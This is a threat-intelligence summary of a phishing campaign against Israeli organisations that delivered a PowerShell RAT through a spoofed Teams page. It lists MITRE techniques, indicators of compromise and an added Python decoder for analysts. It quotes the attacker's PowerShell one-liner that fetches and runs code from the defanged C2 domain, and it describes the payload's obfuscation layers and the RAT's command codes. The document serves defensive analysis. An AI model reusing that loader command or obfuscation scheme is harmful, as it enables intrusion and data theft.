The campaign used compromised internal email and a spoofed Teams page to trick Israeli victims into running a multi-stage, fully PowerShell-based loader that delivered a PowerShell RAT. The malware communicated with hxxps[:]//pharmacynod[.]com for C2, victim registration, command polling, and exfiltration. #pharmacynod #MuddyWater
Key points
- Phishing emails leveraged a spoofed Microsoft Teams page and social engineering (Win+R, paste, Enter) to execute a Base64-encoded PowerShell command.
- The initial PowerShell one-liner retrieved a secondary script from hxxps[:]//pharmacynod[.]com/Fix which then downloaded test.html and a second PS script to reconstruct the final payload.
- Final payload decoding used binary chunks separated by “kendrick”, Base64, double GZip compression, string reversal, and IEX to execute the RAT entirely in PowerShell.
- Hard-coded C2 domain pharmacynod[.]com was used for registration (/16625), command polling, and exfiltration (/17361) over HTTPS with native .NET requests and legitimate User-Agent behavior.
- C2 commands include numeric-prefixed actions (e.g., 7979 reinit, 5322 download file, 4622 update sleep, 2474 execute commands and exfiltrate results), enabling remote code execution, persistence, and data exfiltration.
- Evidence of lateral movement and regional targeting of Israeli business/infrastructure sectors; campaign shows similarities to MuddyWater but attribution is inconclusive due to tooling and tactic differences.
- Fortinet detections and protections exist (e.g., PowerShell/Agent.PH!tr, blocking via FortiEDR, FortiMail, FortiGate IPS, and DNS/Web filtering of pharmacynod[.]com).
MITRE Techniques
- [T1566] Phishing – Initial access via targeted phishing messages using a spoofed Microsoft Teams page that prompts users to paste and run a PowerShell string (“Press & hold Windows key + R…In the verification window, press Ctrl + V…Press Enter on your keyboard to finish”).
- [T1204] User Execution – Social engineering to have users execute a malicious PowerShell command via the Run dialog (“paste the decoded PowerShell command into the Windows Run dialog and presses Enter”).
- [T1059.001] PowerShell – Entire attack chain and RAT executed through PowerShell IEX with downloaded scripts and decoded payloads (“powershell IEX ((Invoke-RestMethod -Uri hxxps[:]//pharmacynod[.]com/Fix -Method GET).note.body)”).
- [T1105] Ingress Tool Transfer – Downloader retrieves test.html and additional scripts from attacker-controlled infrastructure (Invoke-WebRequest to hxxps[:]//pharmacynod[.]com//31133 and //35893).
- [T1027] Obfuscated Files or Information – Payloads and commands are Base64-encoded, double GZip-compressed, reversed, and use custom encodings (binary chunks separated by “kendrick”) to conceal malicious content (“IEX (Decompress-Base64-String … )”).
- [T1071.001] Web Protocols – C2 communication over HTTPS to pharmacynod[.]com for registration, command polling, and exfiltration (“$global:SRV = "hxxps[:]//pharmacynod[.]com/"”).
- [T1016] System Network Configuration Discovery – The init function collects the Windows domain, computer name, and username so the C2 server can identify each victim.
- [T1005] Data from Local System – The RAT can read local files and assemble payloads from the downloaded test.html (reads line 11 of test.html and extracts the content between markers to reconstruct the payload).
- [T1041] Exfiltration Over C2 Channel – Command results and outputs are compressed, reversed, and POSTed back to pharmacynod[.]com/17361 for exfiltration (“exfiltrated back to the endpoint /17361”).
- [T1573] Encrypted Channel – Use of HTTPS and native .NET requests with a legitimate User-Agent and proxy settings to blend C2 traffic with normal network traffic (“uses native .NET HTTP requests, sets a legitimate User-Agent via urlmon.dll, leverages default Windows credentials”).
Indicators of Compromise
- [Domain] C2 and endpoints – hxxps[:]//pharmacynod[.]com/, hxxps[:]//pharmacynod[.]com/16625 (victim registration), hxxps[:]//pharmacynod[.]com/17361 (exfiltration).
- [File name] Downloaded artifacts – test.html (saved to C:\Users\Public\Downloads\test.html) and secondary .ps1 scripts reconstructed from test.html.
- [Hash] Malware sample – SHA256: 46a76b3c7851f30d68ebc6a5584bc099435b0544d8707fff7a9178f46046708b (PowerShell RAT).
- [Obfuscation patterns] Encodings observed – double GZip compression, Base64 encoding, string reversal, and ‘+’ replaced with ‘_’ for URL-safety (used across payloads and C2 communications).
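Added triage helper (not code from the Fortinet write-up or the malware) that peels the obfuscation layers listed under T1027 and the obfuscation-pattern IoC above, so an analyst can recover the script from a captured blob and pull URLs and numeric endpoint paths out of it for blocking. The exact layer order is not stated on the page, so the order used here (binary chunks joined by “kendrick” → Base64 with ‘_’ standing in for ‘+’ → GZip twice → reversed script) and the interpretation of “binary chunks” as 8-bit strings are assumptions; build_sample only exists to construct an offline test input.

```python
import base64
import gzip
import re

DELIM = "kendrick"  # chunk separator named in the write-up


def build_sample(script: str) -> str:
    """Construct a test blob in the ASSUMED layer order (test data, not a real sample)."""
    inner = gzip.compress(gzip.compress(script[::-1].encode("utf-8")))
    b64 = base64.b64encode(inner).decode("ascii").replace("+", "_")
    # Assumption: each Base64 character is carried as one 8-bit binary chunk
    return DELIM.join(format(b, "08b") for b in b64.encode("ascii"))


def decode_payload(blob: str) -> str:
    """Undo the layers: binary chunks -> Base64 -> GZip x2 -> reversed string."""
    chunks = [c for c in blob.split(DELIM) if c]
    if any(len(c) != 8 or set(c) - {"0", "1"} for c in chunks):
        raise ValueError("chunk is not an 8-bit binary string; different encoding?")
    b64 = bytes(int(c, 2) for c in chunks).decode("ascii").replace("_", "+")
    data = base64.b64decode(b64)
    for _ in range(2):  # double GZip, as described in the write-up
        data = gzip.decompress(data)
    return data.decode("utf-8")[::-1]


def extract_iocs(script: str) -> dict:
    """Collect URLs and numeric endpoint paths (e.g. /16625) from a decoded script."""
    urls = sorted(set(re.findall(r"https?://[\w.\-]+(?:/[\w./\-]*)?", script)))
    endpoints = sorted(set(re.findall(r"/(\d{4,6})\b", script)))
    return {"urls": urls, "endpoints": endpoints}


if __name__ == "__main__":
    # Constructed stand-in script using a reserved test domain, not the live C2
    sample = '$global:SRV = "https://example.invalid/"; Invoke-RestMethod -Uri "https://example.invalid/16625"'
    recovered = decode_payload(build_sample(sample))
    print(recovered)
    print(extract_iocs(recovered))
```

Feed decode_payload the blob recovered from test.html (the text between the markers on line 11) and, if it raises, the layer order or chunk encoding differs from the assumption and should be adjusted before proceeding.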